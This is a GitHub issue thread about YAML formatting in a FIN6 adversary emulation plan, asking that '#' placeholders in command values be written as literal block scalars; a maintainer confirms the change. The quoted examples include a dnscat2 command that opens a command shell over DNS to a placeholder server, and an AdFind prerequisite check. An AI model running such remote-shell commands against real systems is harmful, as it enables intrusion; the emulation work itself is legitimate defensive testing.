### ISSUE TITLE
Request to enforce the coherent writing style of command lines (with #) in FIN6.yaml

### ISSUE THREAD

**Issue by shiracamus** [center-for-threat-informed-defense/adversary_emulation_library#31]
I found that FIN6.yaml does not reads as it should according to the YAML standard.  
For example, the [line 716 of FIN6.yaml](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/Emulation_Plan/FIN6.yaml#L716) is as follows.  

```
    command: Start-Dnscat2 -Domain #{dnscat2_server} Exec cmd
```
According to [6.6 Comments](https://yaml.org/spec/1.2/spec.html#id2780069) of YAML Version 1.2, everything after # in the line is treated as a comment. 

This is why my conversion script failed in "Handling # in some command values. For example, the script does not handle these strings properly" as Cyb3rWard0g pointed out in his comment for the [pull request](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/pull/24) for the script. Actually my conversion script (, which uses pyyaml) is handling correctly according to the YAML Version 1.2, but this is not what this FIN6.yaml is intended for. 

What I suggest is to use [Literal Style Block Scalar](https://yaml.org/spec/1.2/spec.html#id2795688) as follows: 

```
    command: |
        Start-Dnscat2 -Domain #{dnscat2_server} Exec cmd
```

This is used most of the places in FIN6.yaml and I suggest you used this style consistently.   
In some places, you escape "#" with a backslash as in the [line 47](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/Emulation_Plan/FIN6.yaml#L47).
```
    prereq_command: if (Test-Path \#{adfind_exe}) {exit 0} else {exit 1}
```

While this is a conformant way for the YAML processors to keep the content after #, the YAML processor keeps the backslash and this will conflict with Windows path separator. I suggest you change this as follows.

```
    prereq_command: |
        if (Test-Path #{adfind_exe}) {exit 0} else {exit 1}
```

There are also places where you use double/single quotes like the [line 49](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/Emulation_Plan/FIN6.yaml#L49)/[line 122](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/Emulation_Plan/FIN6.yaml#L122). This will pass on the double/single quotes after the conversion and makes things very difficult. 

I strongly recommend you use Literal Style Block Scalar consistently.

**Comment by jwbaker-mitre** [comment]
Thank you for your feedback.  Your suggestion to use Literal Style Block Scalar have been implemented in the most recent commit.
